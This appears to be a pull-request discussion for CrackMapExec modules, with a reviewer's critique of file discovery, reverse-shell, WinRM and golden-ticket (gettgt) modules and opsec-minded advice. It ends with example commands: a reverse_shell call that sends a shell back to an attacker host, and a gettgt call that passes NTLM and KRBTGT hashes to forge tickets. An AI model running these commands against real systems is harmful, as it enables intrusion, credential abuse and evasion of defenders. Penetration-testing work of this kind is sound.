file_discovery cme module
revshell.py
Although the ambition is great, I don't think gettgt is done in a very efficient way. From what I can read, you are checking to see if impacket is installed. If it is not installed, then you download the impacket repo to /opt/impacket and run the setup.py script to install impacket. And then you use a subprocess to run ticketer.py to request a ticket. 3f9f0e4#diff-7d45a018c200c99099fee9a07a3e87a1021598d8a56220be40b18eeec7dbe500R38 Although that would make a great shell script, crackmapexec is built around impacket, so it would likely already be installed. What you could try doing is reading the ticketer script and re-implementing it as an impacket module, similar to how this pull request was done. But running this module could actively break crackmapexec under the right circumstances.
Regarding WinRM.py, RevShell.py, and File_discovery, from the looks of it, you are logging in and using PowerShell to run these commands. Although this might be ideal for RevShell.py, using the remote services manager (\pipe\svcctl) to enable/disable services (like WinRM) would be more opsec-safe. This is also how SMBexec and Psexec work. See https://github.com/fortra/impacket/blob/master/examples/psexec.py File_Discovery is also interfacing with PowerShell, but we do have spider_plus and spider to do file lookups. I am not the developer or main contributor to CME, so my word doesn't mean a lot, but I would check out some of the other modules to grow and expand on these. Hope this helps.
Modules pushed:

file_discovery:
crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M file_discovery -o SEARCH_PATH=C:\\Users

revshell:
crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M reverse_shell -o LHOST=192.168.163.136 LPORT=1234 HTTP_SERVER=8443

winrm:

gettgt:
crackmapexec smb 192.168.246.139 -u Administrador -H 2b576acbe6bcfda7294d6bd18041b8fe -M gettgt -o KRBTGT_NTLM=70a415ccf57e2a3c781764a3b1beee95 TARGET_USER=domain_user